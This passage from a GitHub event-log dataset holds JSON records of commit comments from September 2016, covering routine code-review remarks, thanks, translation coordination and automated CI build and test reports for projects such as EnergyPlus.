href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-20T05:03:27Z"}
{"id":"4587494061","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090604,"position":4,"line":88,"path":"src/subscribe.js","commit_id":"c73e271a63a5164daf36ead6b91e7d96574343ff","created_at":"2016-09-20T05:03:38Z","updated_at":"2016-09-20T05:03:38Z","body":"nit: remove debug statement"}},"created_at":"2016-09-20T05:03:38Z"}
{"id":"4587494363","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090605,"position":21,"line":111,"path":"src/subscribe.js","commit_id":"c73e271a63a5164daf36ead6b91e7d96574343ff","created_at":"2016-09-20T05:03:46Z","updated_at":"2016-09-20T05:03:46Z","body":"nit: remove debug statement"}},"created_at":"2016-09-20T05:03:46Z"}
{"id":"4587494662","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090607,"position":24,"line":114,"path":"src/subscribe.js","commit_id":"c73e271a63a5164daf36ead6b91e7d96574343ff","created_at":"2016-09-20T05:03:51Z","updated_at":"2016-09-20T05:03:51Z","body":"nit: remove debug statement"}},"created_at":"2016-09-20T05:03:51Z"}
{"id":"4587496349","type":"CommitCommentEvent","actor":{"login":"gavinmcdermott"},"repo":{"name":"IDEO-coLAB/nomad"},"payload":{"comment":{"id":19090608,"position":19,"line":15,"path":"demoPublish.js","commit_id":"0e551bebaa572d83b48cf16f7f9ba1a3f7063b24","created_at":"2016-09-20T05:04:10Z","updated_at":"2016-09-20T05:04:10Z","body":"nit: spacing"}},"created_at":"2016-09-20T05:04:10Z"}
{"id":"4587498261","type":"CommitCommentEvent","actor":{"login":"byunchangbin"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":19090615,"position":null,"line":null,"path":null,"commit_id":"9209ff1d9a565bddbd55f0e8d47ebaceb9495b0b","created_at":"2016-09-20T05:04:56Z","updated_at":"2016-09-20T05:04:56Z","body":"good"}},"created_at":"2016-09-20T05:04:56Z"}
{"id":"4587500228","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19090623,"position":null,"line":null,"path":null,"commit_id":"09d53223eb02c00332bfe2abd58177bf0e3eed55","created_at":"2016-09-20T05:05:47Z","updated_at":"2016-09-20T05:05:47Z","body":"I see, I'll leave it in there for now tho"}},"created_at":"2016-09-20T05:05:47Z"}
{"id":"4587508706","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090644,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T05:09:29Z","updated_at":"2016-09-20T05:09:29Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-20T05:09:29Z"}
{"id":"4587510977","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090648,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-20T05:10:22Z","updated_at":"2016-09-20T05:10:22Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2332 of 2339 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T05:10:22Z"}
{"id":"4587512636","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19090652,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-20T05:11:03Z","updated_at":"2016-09-20T05:11:03Z","body":"i will upload the control app.\ni think nobody want this tools. so did not upload the controll app.😂😂\n\n2016-09-19 5:06 GMT+08:00 No1KnowMe <notifications@github.com>:\n\n> Hi , i have download and compile this Tweak . i don't know how to use it.\n> Can you upload one Wiki?\n>\n> PS: iOS 9 haven't UIAllertView , now you need to use UIAllertController.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xfunforx/XglyphiOS/commit/bdf58092799d32aa53a57f5fb44612ba11339a96#commitcomment-19072271>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANVDrCDHmZ_ggapq9Np2hOPiiIYK19Cjks5qrafEgaJpZM4KABDI>\n> .\n>\n"}},"created_at":"2016-09-20T05:11:03Z"}
{"id":"4587517222","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090661,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T05:13:03Z","updated_at":"2016-09-20T05:13:03Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T05:13:03Z"}
{"id":"4587518077","type":"CommitCommentEvent","actor":{"login":"matthew-mcallister"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":19090664,"position":null,"line":null,"path":null,"commit_id":"9c2124c68b2cd360732b529741d29a5337bae250","created_at":"2016-09-20T05:13:25Z","updated_at":"2016-09-20T05:13:25Z","body":"Thanks."}},"created_at":"2016-09-20T05:13:25Z"}
{"id":"4587519404","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19090667,"position":null,"line":null,"path":null,"commit_id":"1621d7e089ea5034344c357d38bb757b3fbf94b8","created_at":"2016-09-20T05:13:57Z","updated_at":"2016-09-20T05:13:57Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/1621d7e089ea5034344c357d38bb757b3fbf94b8#commitcomment-19090052) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/d7b33fe16195fd81f0c80defa472d5f27f878bd6/daily_2016_9_20/report.md). cc @jrevels"}},"created_at":"2016-09-20T05:13:57Z"}
{"id":"4587520464","type":"CommitCommentEvent","actor":{"login":"RichieVar2884"},"repo":{"name":"RichieVar2884/Arcadia"},"payload":{"comment":{"id":19090670,"position":2,"line":2,"path":"README.md","commit_id":"d16a41d63f21ac4535c734820ba0a9a83381bd75","created_at":"2016-09-20T05:14:22Z","updated_at":"2016-09-20T05:14:22Z","body":"![aaaaa](https://cloud.githubusercontent.com/assets/22312428/18658297/c0e107ae-7ebe-11e6-86ec-f6be68338cb5.gif)\r\n"}},"created_at":"2016-09-20T05:14:22Z"}
{"id":"4587525884","type":"CommitCommentEvent","actor":{"login":"sindhus"},"repo":{"name":"hackercouch/hackercouch"},"payload":{"comment":{"id":19090683,"position":null,"line":null,"path":null,"commit_id":"866cb415e69e1d687118b33827a5ea03adef17c8","created_at":"2016-09-20T05:16:43Z","updated_at":"2016-09-20T05:16:43Z","body":"oops! sorry about that. "}},"created_at":"2016-09-20T05:16:43Z"}
{"id":"4587527827","type":"CommitCommentEvent","actor":{"login":"Abyss777"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19090687,"position":179,"line":123,"path":"setup/package.sh","commit_id":"20916b8c2017a8c89452fb49321d826f553df9c0","created_at":"2016-09-20T05:17:28Z","updated_at":"2016-09-20T05:17:28Z","body":"setenv.sh called from installDaemon.sh used current dir to made all environment variables.\r\nI think we need add `cd /opt/traccar` before this line."}},"created_at":"2016-09-20T05:17:28Z"}
{"id":"4587528090","type":"CommitCommentEvent","actor":{"login":"acooks"},"repo":{"name":"jeroennijhof/pam_tacplus"},"payload":{"comment":{"id":19090688,"position":null,"line":null,"path":null,"commit_id":"87a678a7ce94b7d6cd22e2e57523b638b2811d06","created_at":"2016-09-20T05:17:34Z","updated_at":"2016-09-20T05:17:34Z","body":"This commit broke a bunch of out-of-tree patches. I'm guessing the change was made using clang-format or a similar process. Could you please describe what that process was, so that I can rebase the out-of-tree patches and prepare to share them?"}},"created_at":"2016-09-20T05:17:34Z"}
{"id":"4587528668","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090690,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T05:17:44Z","updated_at":"2016-09-20T05:17:44Z","body":"develop (macumber) - x86_64-MacOS-10.10-clang: OK (2382 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.3%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T05:17:44Z"}
{"id":"4587530437","type":"CommitCommentEvent","actor":{"login":"2585575866"},"repo":{"name":"2585575866/LXX2"},"payload":{"comment":{"id":19090697,"position":null,"line":null,"path":null,"commit_id":"be6e5de6abbc405731941b1a713f58cf83fe369e","created_at":"2016-09-20T05:18:27Z","updated_at":"2016-09-20T05:18:27Z","body":"aaaaa"}},"created_at":"2016-09-20T05:18:27Z"}
{"id":"4587531736","type":"CommitCommentEvent","actor":{"login":"2585575866"},"repo":{"name":"2585575866/LXX2"},"payload":{"comment":{"id":19090701,"position":null,"line":null,"path":null,"commit_id":"be6e5de6abbc405731941b1a713f58cf83fe369e","created_at":"2016-09-20T05:19:02Z","updated_at":"2016-09-20T05:19:02Z","body":"你好"}},"created_at":"2016-09-20T05:19:02Z"}
{"id":"4587536632","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19090714,"position":null,"line":null,"path":null,"commit_id":"396aff71da19b6b8d844e555f13a218f9c7938bc","created_at":"2016-09-20T05:21:03Z","updated_at":"2016-09-20T05:21:03Z","body":"As I said some were im no expert in LUA, thanks for tip and i would appreciate such advices in future :+1: "}},"created_at":"2016-09-20T05:21:03Z"}
{"id":"4587537079","type":"CommitCommentEvent","actor":{"login":"manavgabhawala"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19090715,"position":5,"line":9,"path":"templates/application_search.html","commit_id":"c977d4be3271cee3e000ae92801f9d844c31ecb7","created_at":"2016-09-20T05:21:13Z","updated_at":"2016-09-20T05:21:13Z","body":"Typo?"}},"created_at":"2016-09-20T05:21:13Z"}
{"id":"4587537402","type":"CommitCommentEvent","actor":{"login":"brandorags"},"repo":{"name":"brandorags/KeepInChecker"},"payload":{"comment":{"id":19090716,"position":null,"line":null,"path":null,"commit_id":"e21fe6edf0c374cf0a5cf4fe5f9c33d3bcf852c2","created_at":"2016-09-20T05:21:20Z","updated_at":"2016-09-20T05:21:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;z5lJtiJl&#x2F;80-prevent-network-traffic-scanning-threads-from-stepping-on-each-other\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> prevent network traffic scanning threads from stepping on each other</a>"}},"created_at":"2016-09-20T05:21:20Z"}
{"id":"4587540228","type":"CommitCommentEvent","actor":{"login":"tananaev"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19090724,"position":179,"line":123,"path":"setup/package.sh","commit_id":"20916b8c2017a8c89452fb49321d826f553df9c0","created_at":"2016-09-20T05:22:33Z","updated_at":"2016-09-20T05:22:33Z","body":"No, it doesn't. It saves current directory, and then actually goes to the directory of the script (/opt/traccar/bin), and then goes one level up (/opt/traccar). In the end it restores current directory.\r\n\r\nI think that's exactly what we want."}},"created_at":"2016-09-20T05:22:33Z"}
{"id":"4587540344","type":"CommitCommentEvent","actor":{"login":"manavgabhawala"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19090726,"position":4,"line":34,"path":"config/settings.py","commit_id":"ca57b69eb2f9c66bd3e0019f7a65f230f807d6d0","created_at":"2016-09-20T05:22:35Z","updated_at":"2016-09-20T05:22:35Z","body":"Bruh where's that requirement.txt update?"}},"created_at":"2016-09-20T05:22:35Z"}
{"id":"4587541410","type":"CommitCommentEvent","actor":{"login":"ganeshi4u"},"repo":{"name":"Galaxy-J5/android_device_samsung_j5-common"},"payload":{"comment":{"id":19090729,"position":null,"line":null,"path":null,"commit_id":"523523e4b2a19dbab73ce6501ca120da754d39c9","created_at":"2016-09-20T05:23:02Z","updated_at":"2016-09-20T05:23:02Z","body":"i don't think removing home key as a wakup source would be a nice move,without home key the usage of power button increases which gradually wears out."}},"created_at":"2016-09-20T05:23:02Z"}
{"id":"4587542043","type":"CommitCommentEvent","actor":{"login":"kmkpbk"},"repo":{"name":"kmkpbk/imad-2016-app"},"payload":{"comment":{"id":19090730,"position":4,"line":13,"path":"ui/index.html","commit_id":"900c2bd74365848cdb7970cf242beba7891d8703","created_at":"2016-09-20T05:23:19Z","updated_at":"2016-09-20T05:23:19Z","body":"ok"}},"created_at":"2016-09-20T05:23:19Z"}
{"id":"4587547422","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19090746,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T05:25:25Z","updated_at":"2016-09-20T05:25:25Z","body":"Meaning that for ABM a fix has to be created. Simplest way is to add the screen to the skin."}},"created_at":"2016-09-20T05:25:25Z"}
{"id":"4587549856","type":"CommitCommentEvent","actor":{"login":"krishanthi90"},"repo":{"name":"asingh8c/Codewarriors_Asg3"},"payload":{"comment":{"id":19090748,"position":null,"line":null,"path":null,"commit_id":"65f3dbbc436177308a5ac9ad257eb15b029ca505","created_at":"2016-09-20T05:26:19Z","updated_at":"2016-09-20T05:26:19Z","body":"Done few more test cases"}},"created_at":"2016-09-20T05:26:19Z"}
{"id":"4587552967","type":"CommitCommentEvent","actor":{"login":"Super-Baleine"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":19090752,"position":56,"line":294,"path":"application/controllers/User.php","commit_id":"8065aaab3799f8872caf9c098d4bd2e7e92fefff","created_at":"2016-09-20T05:27:24Z","updated_at":"2016-09-20T05:27:24Z","body":"M'okay"}},"created_at":"2016-09-20T05:27:24Z"}
{"id":"4587560183","type":"CommitCommentEvent","actor":{"login":"kyranf"},"repo":{"name":"kyranf/robotarmyfactorio"},"payload":{"comment":{"id":19090786,"position":null,"line":null,"path":null,"commit_id":"6ba745f0ae0a2803413606e0b13f13c4789636de","created_at":"2016-09-20T05:30:00Z","updated_at":"2016-09-20T05:30:00Z","body":"@petergaultney  no worries mate! The seething mass of code appears daunting at first, but there are really just lots of separate sections that do their own bit. It's hard to manage a large lua project :("}},"created_at":"2016-09-20T05:30:00Z"}
{"id":"4587565785","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19090802,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T05:32:08Z","updated_at":"2016-09-20T05:32:08Z","body":"Done just that: https://github.com/oe-alliance/oe-alliance-e2-skindefault/commit/316f9c1abd56b88ff69d863d4eb72551da90de47"}},"created_at":"2016-09-20T05:32:08Z"}
{"id":"4587568685","type":"CommitCommentEvent","actor":{"login":"Abyss777"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19090817,"position":179,"line":123,"path":"setup/package.sh","commit_id":"20916b8c2017a8c89452fb49321d826f553df9c0","created_at":"2016-09-20T05:33:12Z","updated_at":"2016-09-20T05:33:12Z","body":"Oh, sorry, you are right.\r\n\r\n"}},"created_at":"2016-09-20T05:33:12Z"}
{"id":"4587570937","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19090821,"position":31,"line":250,"path":"truffle/src/main/ruby/core/type.rb","commit_id":"41e28fd827c259fc5f81697ba98a3f4af5561526","created_at":"2016-09-20T05:34:06Z","updated_at":"2016-09-20T05:34:06Z","body":"Thanks, I've updated this at 2e7a90c72693548627adda4820b47289c3b05c2a"}},"created_at":"2016-09-20T05:34:06Z"}
{"id":"4587583591","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19090856,"position":null,"line":null,"path":null,"commit_id":"7770a3b64e92541537a5e4ba1bfb1748de001bde","created_at":"2016-09-20T05:39:17Z","updated_at":"2016-09-20T05:39:17Z","body":"@marci4 @rodrigoswz @Garduna1976 hey guys do you think you can translate those new strings.\r\nalso I have a light week at work, and I am gonna have a lot of time to code and add new strings. Will you be able to catch up?\r\nThanks"}},"created_at":"2016-09-20T05:39:17Z"}
{"id":"4587590895","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19090874,"position":null,"line":null,"path":null,"commit_id":"6fdd81f11ea26af8da23ab9e92adde5a69f4b4f6","created_at":"2016-09-20T05:42:10Z","updated_at":"2016-09-20T05:42:10Z","body":"How about #1016?"}},"created_at":"2016-09-20T05:42:10Z"}
{"id":"4587592390","type":"CommitCommentEvent","actor":{"login":"Garduna1976"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19090877,"position":null,"line":null,"path":null,"commit_id":"7770a3b64e92541537a5e4ba1bfb1748de001bde","created_at":"2016-09-20T05:42:43Z","updated_at":"2016-09-20T05:42:43Z","body":"I will translate the new strings richt away. And yes, I am able to catch up\nthis week.\n\nOp 20 sep. 2016 07:39 schreef \"rascarlo\" <notifications@github.com>:\n\n> @marci4 <https://github.com/marci4> @rodrigoswz\n> <https://github.com/rodrigoswz> @Garduna1976\n> <https://github.com/Garduna1976> hey guys do you think you can translate\n> those new strings.\n> also I have a light week at work, and I am gonna have a lot of time to\n> code and add new strings. Will you be able to catch up?\n> Thanks\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TilesLocalization/resources/commit/7770a3b64e92541537a5e4ba1bfb1748de001bde#commitcomment-19090856>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVOo15tBHSKLupVxbrjSWMH-qY-weIlyks5qr3GGgaJpZM4KBPke>\n> .\n>\n"}},"created_at":"2016-09-20T05:42:43Z"}
{"id":"4587593948","type":"CommitCommentEvent","actor":{"login":"lizhong1008"},"repo":{"name":"lizhong1008/libyami-utils"},"payload":{"comment":{"id":19090883,"position":21,"line":125,"path":"tests/yamitranscode.cpp","commit_id":"43a09803ae976e3d1815a4867fc37e5f0804dce3","created_at":"2016-09-20T05:43:22Z","updated_at":"2016-09-20T05:43:22Z","body":"Not necessary, almost application use \"-h\" to print help info. "}},"created_at":"2016-09-20T05:43:22Z"}
{"id":"4587595431","type":"CommitCommentEvent","actor":{"login":"ilyakatz"},"repo":{"name":"founderlab/react-dropzone-s3-uploader"},"payload":{"comment":{"id":19090887,"position":201,"line":176,"path":"lib/DropzoneS3Uploader.js","commit_id":"7c5d40daef4406ccc716b7c5a2eeb583b291a8b2","created_at":"2016-09-20T05:43:55Z","updated_at":"2016-09-20T05:43:55Z","body":"is this intentional? with this change now `s3Url` is defined twice"}},"created_at":"2016-09-20T05:43:55Z"}
{"id":"4587597039","type":"CommitCommentEvent","actor":{"login":"Kyle873"},"repo":{"name":"Kyle873/PolarisCore"},"payload":{"comment":{"id":19090892,"position":null,"line":null,"path":null,"commit_id":"5221b0fba14629199226beae22b3094501a55610","created_at":"2016-09-20T05:44:33Z","updated_at":"2016-09-20T05:44:33Z","body":"Note to self: When creating a new file in VS, the template it uses still contains spaces. Ctrl+K-D every new created file to convert them."}},"created_at":"2016-09-20T05:44:33Z"}
{"id":"4587604491","type":"CommitCommentEvent","actor":{"login":"mboehm7"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":19090910,"position":null,"line":null,"path":null,"commit_id":"c3c6bccf5309a7e9e0c234bcdfcf6a681c0c7dbe","created_at":"2016-09-20T05:47:28Z","updated_at":"2016-09-20T05:47:28Z","body":"good catch - thanks @gweidner "}},"created_at":"2016-09-20T05:47:28Z"}
{"id":"4587604741","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090911,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T05:47:34Z","updated_at":"2016-09-20T05:47:34Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T05:47:34Z"}
{"id":"4587606458","type":"CommitCommentEvent","actor":{"login":"Group2SoftEng"},"repo":{"name":"Group2SoftEng/AboutMe-App"},"payload":{"comment":{"id":19090914,"position":43,"line":0,"path":"Aboutus/app/src/main/java/com/weebly/codersforceliac/aboutus/AboutPage.java","commit_id":"ec8aff0fd98f0fc28f75a437071174bde8fe1386","created_at":"2016-09-20T05:48:12Z","updated_at":"2016-09-20T05:48:12Z","body":"Test"}},"created_at":"2016-09-20T05:48:12Z"}
{"id":"4587609675","type":"CommitCommentEvent","actor":{"login":"twinj"},"repo":{"name":"ryba-xek/uuid"},"payload":{"comment":{"id":19090919,"position":null,"line":null,"path":null,"commit_id":"4482a7cd2749f594272393e87bffd1b516fb8c46","created_at":"2016-09-20T05:49:23Z","updated_at":"2016-09-20T05:49:23Z","body":"Hi, this change breaks the promise that this method implements the encoder interface. If this change was for your own needs I would recommend wrapping this function or using format functions that already exist."}},"created_at":"2016-09-20T05:49:23Z"}
{"id":"4587610956","type":"CommitCommentEvent","actor":{"login":"KenTate"},"repo":{"name":"KenTate/kentate.github.io"},"payload":{"comment":{"id":19090922,"position":6,"line":6,"path":"style.css","commit_id":"a2a87c07a55e4a40bcc834d569dc63a3e0682bd9","created_at":"2016-09-20T05:49:54Z","updated_at":"2016-09-20T05:49:54Z","body":"z"}},"created_at":"2016-09-20T05:49:54Z"}
{"id":"4587612934","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19090927,"position":43,"line":43,"path":"src/main/java/org/spongepowered/common/mixin/core/entity/MixinRanger.java","commit_id":"e770daaae083f6fe8c557fa00201ec301dd6b489","created_at":"2016-09-20T05:50:41Z","updated_at":"2016-09-20T05:50:41Z","body":"Can't you just mixin `IRangedAttackMod` like [`MixinModContainer`] (https://github.com/SpongePowered/SpongeForge/blob/bleeding/src/main/java/org/spongepowered/mod/mixin/core/fml/common/MixinModContainer.java) does? [`ModContainer`](https://github.com/MinecraftForge/MinecraftForge/blob/1.10.x/src/main/java/net/minecraftforge/fml/common/ModContainer.java) is also an interface."}},"created_at":"2016-09-20T05:50:41Z"}
{"id":"4587615221","type":"CommitCommentEvent","actor":{"login":"perchrh"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19090930,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-20T05:51:31Z","updated_at":"2016-09-20T05:51:31Z","body":"@ojw28 With plugin version 2.2.0 (release) and Gradle 2.14.1, I can't reproduce the hang. It's probably fixed!\r\n"}},"created_at":"2016-09-20T05:51:31Z"}
{"id":"4587618555","type":"CommitCommentEvent","actor":{"login":"gweidner"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":19090934,"position":null,"line":null,"path":null,"commit_id":"c3c6bccf5309a7e9e0c234bcdfcf6a681c0c7dbe","created_at":"2016-09-20T05:52:46Z","updated_at":"2016-09-20T05:52:46Z","body":"No problem @mboehm7  - I just caught it from PR builder since I don't build with rat profile in my development environment and just wanted to get it in before the nightly build starts.  Thanks again for cleaning up MLContext and related code."}},"created_at":"2016-09-20T05:52:46Z"}
{"id":"4587620313","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090937,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-20T05:53:29Z","updated_at":"2016-09-20T05:53:29Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2339 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T05:53:29Z"}
{"id":"4587620372","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19090938,"position":null,"line":null,"path":null,"commit_id":"2c5b9080ad485953ecfea5770102d1b241e991c9","created_at":"2016-09-20T05:53:30Z","updated_at":"2016-09-20T05:53:30Z","body":"In fact, Alpine image has been updated 6 hours ago and `apk --no-cache upgrade` doesn't get any new packages while Docker Hub still reports that the image still has an out-dated openssl."}},"created_at":"2016-09-20T05:53:30Z"}
{"id":"4587621688","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"nosix/PyCraft"},"payload":{"comment":{"id":19090941,"position":null,"line":null,"path":null,"commit_id":"4aecab8350bfbdf43d50f7fdca529eae3ab91d3a","created_at":"2016-09-20T05:54:01Z","updated_at":"2016-09-20T05:54:01Z","body":"Thanks"}},"created_at":"2016-09-20T05:54:01Z"}
{"id":"4587622799","type":"CommitCommentEvent","actor":{"login":"gonetz"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19090945,"position":null,"line":null,"path":null,"commit_id":"8dad84cc39571c295d10a3b3c9326fa942478fcd","created_at":"2016-09-20T05:54:26Z","updated_at":"2016-09-20T05:54:26Z","body":"That commit does not affect plugin's work when fb is off.\r\nCould you track down which commit causes the regression? Desktop version works ok."}},"created_at":"2016-09-20T05:54:26Z"}
